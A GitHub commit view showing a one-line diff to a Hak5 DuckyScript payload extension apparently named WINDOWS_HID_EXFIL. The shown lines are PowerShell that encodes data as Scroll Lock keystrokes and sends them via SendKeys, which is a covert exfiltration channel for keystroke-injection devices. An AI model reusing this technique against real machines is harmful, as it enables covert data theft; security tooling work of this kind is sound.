Merge branch 'hak5:master' into master

pull/314/head
0iphor13 2023-05-03 20:34:40 +02:00 committed by GitHub
commit 3557fa5cf8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 1 deletions

View File

@ -51,7 +51,6 @@ EXTENSION WINDOWS_HID_EXFIL
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
END_STRING
IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL
STRING exit;